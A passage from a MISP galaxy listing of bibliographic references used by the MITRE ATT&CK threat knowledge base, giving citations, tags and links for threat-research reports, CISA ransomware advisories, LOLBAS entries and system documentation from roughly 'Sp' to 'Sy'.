https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/

FireEye Regsvr32 Targeting Mongolian Gov

Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.

The tag is: misp-galaxy:references="FireEye Regsvr32 Targeting Mongolian Gov"

Table 15473. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html

FireEye admin@338 March 2014

Moran, N. and Lanstein, A.. (2014, March 25). Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370. Retrieved April 15, 2016.

The tag is: misp-galaxy:references="FireEye admin@338 March 2014"

Table 15474. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Microsoft File Handlers

Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.

The tag is: misp-galaxy:references="Microsoft File Handlers"

Table 15475. Table References

Links

http://msdn.microsoft.com/en-us/library/bb166549.aspx

GTFO split

GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.

The tag is: misp-galaxy:references="GTFO split"

Table 15476. Table References

Links

https://gtfobins.github.io/gtfobins/split/

split man page

Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="split man page"

Table 15477. Table References

Links

https://man7.org/linux/man-pages/man1/split.1.html

Spoofing credential dialogs

Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Spoofing credential dialogs"

Table 15478. Table References

Links

https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/

Infosecinstitute RTLO Technique

Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Infosecinstitute RTLO Technique"

Table 15479. Table References

Links

https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/

BBC-malvertising

BBC. (2011, March 29). Spotify ads hit by malware attack. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="BBC-malvertising"

Table 15480. Table References

Links

https://www.bbc.com/news/technology-12891182

NSA Spotting

National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.

The tag is: misp-galaxy:references="NSA Spotting"

Table 15481. Table References

Links

https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

Villeneuve 2014

Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.

The tag is: misp-galaxy:references="Villeneuve 2014"

Table 15482. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

Sqldumper.exe - LOLBAS Project

LOLBAS. (2018, May 25). Sqldumper.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Sqldumper.exe - LOLBAS Project"

Table 15483. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/

sqlmap Introduction

Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="sqlmap Introduction"

Table 15484. Table References

Links

http://sqlmap.org/

Sqlps.exe - LOLBAS Project

LOLBAS. (2018, May 25). Sqlps.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Sqlps.exe - LOLBAS Project"

Table 15485. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/

SQLToolsPS.exe - LOLBAS Project

LOLBAS. (2018, May 25). SQLToolsPS.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="SQLToolsPS.exe - LOLBAS Project"

Table 15486. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqltoolsps/

Squirrel.exe - LOLBAS Project

LOLBAS. (2019, June 26). Squirrel.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Squirrel.exe - LOLBAS Project"

Table 15487. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/

ZScaler Squirrelwaffle Sep 2021

Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.

The tag is: misp-galaxy:references="ZScaler Squirrelwaffle Sep 2021"

Table 15488. Table References

Links

https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike

Netskope Squirrelwaffle Oct 2021

Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022.

The tag is: misp-galaxy:references="Netskope Squirrelwaffle Oct 2021"

Table 15489. Table References

Links

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

Clockwork SSH Agent Hijacking

Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Clockwork SSH Agent Hijacking"

Table 15490. Table References

Links

https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking

Symantec SSH and ssh-agent

Hatch, B. (2004, November 22). SSH and ssh-agent. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="Symantec SSH and ssh-agent"

Table 15491. Table References

Links

https://www.symantec.com/connect/articles/ssh-and-ssh-agent

ssh.exe - LOLBAS Project

LOLBAS. (2021, November 8). ssh.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="ssh.exe - LOLBAS Project"

Table 15492. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ssh/

SSH Secure Shell

SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.

The tag is: misp-galaxy:references="SSH Secure Shell"

Table 15493. Table References

Links

https://www.ssh.com/ssh

SSH Tunneling

SSH.COM. (n.d.). SSH tunnel. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="SSH Tunneling"

Table 15494. Table References

Links

https://www.ssh.com/ssh/tunneling

SSLShopper Lookup

SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="SSLShopper Lookup"

Table 15495. Table References

Links

https://www.sslshopper.com/ssl-checker.html

Ubuntu SSSD Docs

Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Ubuntu SSSD Docs"

Table 15496. Table References

Links

https://ubuntu.com/server/docs/service-sssd

Stantinko Botnet

Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Stantinko Botnet"

Table 15497. Table References

Links

https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/

Amazon AWS

Amazon. (n.d.). Start Building on AWS Today. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon AWS"

Table 15498. Table References

Links

https://aws.amazon.com

Startup Items

Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.

The tag is: misp-galaxy:references="Startup Items"

Table 15499. Table References

Links

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

Microsoft Safe Mode

Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="Microsoft Safe Mode"

Table 15500. Table References

Links

https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234

Mandiant APT41

Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="Mandiant APT41"

Table 15501. Table References

Links

https://www.mandiant.com/resources/apt41-us-state-governments

Twitter SquiblyTwo Detection APR 2018

Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Twitter SquiblyTwo Detection APR 2018"

Table 15502. Table References

Links

https://twitter.com/dez_/status/986614411711442944

Mandiant Endpoint Evading 2019

Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.

The tag is: misp-galaxy:references="Mandiant Endpoint Evading 2019"

Table 15503. Table References

Links

https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode

AADInternals Azure AD Device Identities

Dr. Nestori Syynimaa. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="AADInternals Azure AD Device Identities"

Table 15504. Table References

Links

https://aadinternals.com/post/deviceidentity/

O365 Blog Azure AD Device IDs

Syynimaa, N. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved August 3, 2022.

The tag is: misp-galaxy:references="O365 Blog Azure AD Device IDs"

Table 15505. Table References

Links

https://o365blog.com/post/deviceidentity/

Carnal Ownage Password Filters Sept 2013

Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Carnal Ownage Password Filters Sept 2013"

Table 15506. Table References

Links

http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html

CSM Elderwood Sept 2012

Clayton, M.. (2012, September 14). Stealing US business secrets: Experts ID two huge cyber 'gangs' in China. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="CSM Elderwood Sept 2012"

Table 15507. Table References

Links

https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China

DEFCON2016 Sticky Keys

Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="DEFCON2016 Sticky Keys"

Table 15508. Table References

Links

https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom

The DFIR Report Stolen Images Conti

The DFIR Report. (2023, April 4). Stolen Images Campaign Ends in Conti Ransomware. Retrieved June 23, 2023.

The tag is: misp-galaxy:references="The DFIR Report Stolen Images Conti"

Table 15509. Table References

Links

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

Netscout Stolen Pencil Dec 2018

ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.

The tag is: misp-galaxy:references="Netscout Stolen Pencil Dec 2018"

Table 15510. Table References

Links

https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

FireEye VBA stomp Feb 2020

Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="FireEye VBA stomp Feb 2020"

Table 15511. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html

Stopping CloudTrail from Sending Events to CloudWatch Logs

Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Stopping CloudTrail from Sending Events to CloudWatch Logs"

Table 15512. Table References

Links

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html

McAfee Virtual Jan 2017

Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="McAfee Virtual Jan 2017"

Table 15513. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/

Checkpoint Dridex Jan 2021

Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.

The tag is: misp-galaxy:references="Checkpoint Dridex Jan 2021"

Table 15514. Table References

Links

https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

U.S. CISA ALPHV Blackcat December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 19). #StopRansomware: ALPHV Blackcat. Retrieved December 19, 2023.

The tag is: misp-galaxy:references="U.S. CISA ALPHV Blackcat December 2023"

Table 15515. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a

U.S. CISA AvosLocker October 11 2023

Cybersecurity and Infrastructure Security Agency. (2023, October 11). #StopRansomware: AvosLocker Ransomware (Update). Retrieved October 20, 2023.

The tag is: misp-galaxy:references="U.S. CISA AvosLocker October 11 2023"

Table 15516. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-284a

U.S. CISA BianLian Ransomware May 2023

Cybersecurity and Infrastructure Security Agency. (2023, May 16). #StopRansomware: BianLian Ransomware Group. Retrieved May 18, 2023.

The tag is: misp-galaxy:references="U.S. CISA BianLian Ransomware May 2023"

Table 15517. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

U.S. CISA CL0P CVE-2023-34362 Exploitation

Cybersecurity and Infrastructure Security Agency. (2023, June 7). #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability. Retrieved July 27, 2023.

The tag is: misp-galaxy:references="U.S. CISA CL0P CVE-2023-34362 Exploitation"

Table 15518. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a

U.S. CISA Daixin Team October 2022

Cybersecurity and Infrastructure Security Agency. (2022, October 26). #StopRansomware: Daixin Team. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="U.S. CISA Daixin Team October 2022"

Table 15519. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a

U.S. CISA LockBit 3.0 March 2023

Cybersecurity and Infrastructure Security Agency. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="U.S. CISA LockBit 3.0 March 2023"

Table 15520. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

U.S. CISA LockBit Citrix Bleed November 21 2023

Cybersecurity and Infrastructure Security Agency. (2023, November 21). #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability. Retrieved November 30, 2023.

The tag is: misp-galaxy:references="U.S. CISA LockBit Citrix Bleed November 21 2023"

Table 15521. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a

U.S. CISA MedusaLocker August 11 2022

Cybersecurity and Infrastructure Security Agency. (2022, August 11). #StopRansomware: MedusaLocker. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="U.S. CISA MedusaLocker August 11 2022"

Table 15522. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a

U.S. CISA Play Ransomware December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 18). #StopRansomware: Play Ransomware. Retrieved December 18, 2023.

The tag is: misp-galaxy:references="U.S. CISA Play Ransomware December 2023"

Table 15523. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a

U.S. CISA Rhysida Ransomware November 15 2023

Cybersecurity and Infrastructure Security Agency. (2023, November 15). #StopRansomware: Rhysida Ransomware. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="U.S. CISA Rhysida Ransomware November 15 2023"

Table 15524. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a

CISA Royal AA23-061A March 2023

CISA. (2023, March 2). #StopRansomware: Royal Ransomware. Retrieved March 31, 2023.

The tag is: misp-galaxy:references="CISA Royal AA23-061A March 2023"

Table 15525. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

U.S. CISA Vice Society September 2022

Cybersecurity and Infrastructure Security Agency. (2022, September 8). #StopRansomware: Vice Society. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="U.S. CISA Vice Society September 2022"

Table 15526. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-249a-0

Stordiag.exe - LOLBAS Project

LOLBAS. (2021, October 21). Stordiag.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Stordiag.exe - LOLBAS Project"

Table 15527. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Stordiag/

Pentestlab Stored Credentials

netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Pentestlab Stored Credentials"

Table 15528. Table References

Links

https://pentestlab.blog/2017/04/19/stored-credentials/

store_pwd_rev_enc

Microsoft. (2021, October 28). Store passwords using reversible encryption. Retrieved January 3, 2022.

The tag is: misp-galaxy:references="store_pwd_rev_enc"

Table 15529. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption

IBM Storwize

IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="IBM Storwize"

Table 15530. Table References

Links

https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028--OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206--E

G Data Sodinokibi June 2019

Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="G Data Sodinokibi June 2019"

Table 15531. Table References

Links

https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data

Windows Blogs Microsoft Edge Sandbox

Cowan, C. (2017, March 23). Strengthening the Microsoft Edge Sandbox. Retrieved March 12, 2018.

The tag is: misp-galaxy:references="Windows Blogs Microsoft Edge Sandbox"

Table 15532. Table References

Links

https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/

Symantec Strider Blog

Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Symantec Strider Blog"

Table 15533. Table References

Links

http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets

Cybereason StrifeWater Feb 2022

Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.

The tag is: misp-galaxy:references="Cybereason StrifeWater Feb 2022"

Table 15534. Table References

Links

https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

Bitdefender StrongPity June 2020

Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.

The tag is: misp-galaxy:references="Bitdefender StrongPity June 2020"

Table 15535. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020

Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.

The tag is: misp-galaxy:references="Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020"

Table 15536. Table References

Links

https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/

ESET Stuxnet Under the Microscope

Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.

The tag is: misp-galaxy:references="ESET Stuxnet Under the Microscope"

Table 15537. Table References

Links

https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf

subTee .NET Profilers May 2017

Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="subTee .NET Profilers May 2017"

Table 15538. Table References

Links

https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html

SpectorOps Subverting Trust Sept 2017

Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="SpectorOps Subverting Trust Sept 2017"

Table 15539. Table References

Links

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Symantec Suckfly March 2016

DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Symantec Suckfly March 2016"

Table 15540. Table References

Links

http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

sudo man page 2018

Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="sudo man page 2018"

Table 15541. Table References

Links

https://www.sudo.ws/

FireEye SUNBURST Additional Details Dec 2020

Stephen Eckels, Jay Smith, William Ballenthin. (2020, December 24). SUNBURST Additional Technical Details. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="FireEye SUNBURST Additional Details Dec 2020"

Table 15542. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html

Check Point Sunburst Teardrop December 2020

Check Point Research. (2020, December 22). SUNBURST, TEARDROP and the NetSec New Normal. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Check Point Sunburst Teardrop December 2020"

Table 15543. Table References

Links

https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/

CheckPoint Sunburst & Teardrop December 2020

Check Point Research. (2020, December 22). SUNBURST, TEARDROP and the NetSec New Normal. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="CheckPoint Sunburst & Teardrop December 2020"

Table 15544. Table References

Links

https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/

CrowdStrike SUNSPOT Implant January 2021

CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.

The tag is: misp-galaxy:references="CrowdStrike SUNSPOT Implant January 2021"

Table 15545. Table References

Links

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

Kaspersky Superfish

Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.

The tag is: misp-galaxy:references="Kaspersky Superfish"

Table 15546. Table References

Links

https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/

Unit42 SUPERNOVA Dec 2020

Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Unit42 SUPERNOVA Dec 2020"

Table 15547. Table References

Links

https://unit42.paloaltonetworks.com/solarstorm-supernova/

Guidepoint SUPERNOVA Dec 2020

Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021.

The tag is: misp-galaxy:references="Guidepoint SUPERNOVA Dec 2020"

Table 15548. Table References

Links

https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/

00sec Droppers

0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="00sec Droppers"

Table 15549. Table References

Links

https://0x00sec.org/t/super-stealthy-droppers/3715

FireEyeSupplyChain

FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="FireEyeSupplyChain"

Table 15550. Table References

Links

https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop

Moran 2013

Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Moran 2013"

Table 15551. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html

Dell Threat Group 2889

Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="Dell Threat Group 2889"

Table 15552. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/

Mandiant UNC3890 Aug 2022

Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022.

The tag is: misp-galaxy:references="Mandiant UNC3890 Aug 2022"

Table 15553. Table References

Links

https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping

Suspected Russian Activity Targeting Government and Business Entities Around the Globe

Luke Jenkins, Sarah Hawley, Parnian Najafi, Doug Bienstock. (2021, December 6). Suspected Russian Activity Targeting Government and Business Entities Around the Globe. Retrieved April 15, 2022.

The tag is: misp-galaxy:references="Suspected Russian Activity Targeting Government and Business Entities Around the Globe"

Table 15554. Table References

Links

https://www.mandiant.com/resources/russian-targeting-gov-business

U.S. CISA APT29 Cloud Access

Cybersecurity and Infrastructure Security Agency. (2024, February 26). SVR Cyber Actors Adapt Tactics for Initial Cloud Access. Retrieved March 1, 2024.

The tag is: misp-galaxy:references="U.S. CISA APT29 Cloud Access"

Table 15555. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a

Recorded Future Turla Infra 2020

Insikt Group. (2020, March 12). Swallowing the Snake’s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Recorded Future Turla Infra 2020"

Table 15556. Table References

Links

https://www.recordedfuture.com/turla-apt-infrastructure/

Microsoft Sxstrace

Gerend, J. et al.. (2017, October 16). sxstrace. Retrieved April 26, 2021.

The tag is: misp-galaxy:references="Microsoft Sxstrace"

Table 15557. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/sxstrace

Alienvault Sykipot DOD Smart Cards

Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. Retrieved January 10, 2016.

The tag is: misp-galaxy:references="Alienvault Sykipot DOD Smart Cards"

Table 15558. Table References

Links

https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards

SecureList SynAck Doppelgänging May 2018

Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="SecureList SynAck Doppelgänging May 2018"

Table 15559. Table References

Links

https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/

SyncAppvPublishingServer.exe - LOLBAS Project

LOLBAS. (2018, May 25). SyncAppvPublishingServer.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="SyncAppvPublishingServer.exe - LOLBAS Project"

Table 15560. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

Syncappvpublishingserver.vbs - LOLBAS Project

LOLBAS. (2018, May 25). Syncappvpublishingserver.vbs. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Syncappvpublishingserver.vbs - LOLBAS Project"

Table 15561. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/

Mandiant - Synful Knock

Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Mandiant - Synful Knock"

Table 15562. Table References

Links

https://www.mandiant.com/resources/synful-knock-acis

Sysmon EID 9

Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="Sysmon EID 9"

Table 15563. Table References

Links

https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread

Microsoft Sysmon v6 May 2017

Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.

The tag is: misp-galaxy:references="Microsoft Sysmon v6 May 2017"

Table 15564. Table References

Links

https://docs.microsoft.com/sysinternals/downloads/sysmon

Syssetup.dll - LOLBAS Project

LOLBAS. (2018, May 25). Syssetup.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Syssetup.dll - LOLBAS Project"

Table 15565. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Syssetup/

System and kernel extensions in macOS

Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="System and kernel extensions in macOS"

Table 15566. Table References

Links

https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web

Linux man-pages: systemd January 2014

Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Linux man-pages: systemd January 2014"

Table 15567. Table References

Links

http://man7.org/linux/man-pages/man1/systemd.1.html

FreeDesktop Journal

freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022.

The tag is: misp-galaxy:references="FreeDesktop Journal"

Table 15568. Table References

Links

https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html

Ubuntu Manpage systemd rc

Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and /usr/sbin/halt.local during boot and shutdown. Retrieved February 23, 2021.

The tag is: misp-galaxy:references="Ubuntu Manpage systemd rc"

Table 15569. Table References

Links

http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html

freedesktop systemd.service

Free Desktop. (n.d.). systemd.service — Service unit configuration. Retrieved March 20, 2023.

The tag is: misp-galaxy:references="freedesktop systemd.service"

Table 15570. Table References

Links

https://www.freedesktop.org/software/systemd/man/systemd.service.html

Systemd Service Units

Freedesktop.org. (n.d.). systemd.service — Service unit configuration. Retrieved March 16, 2020.

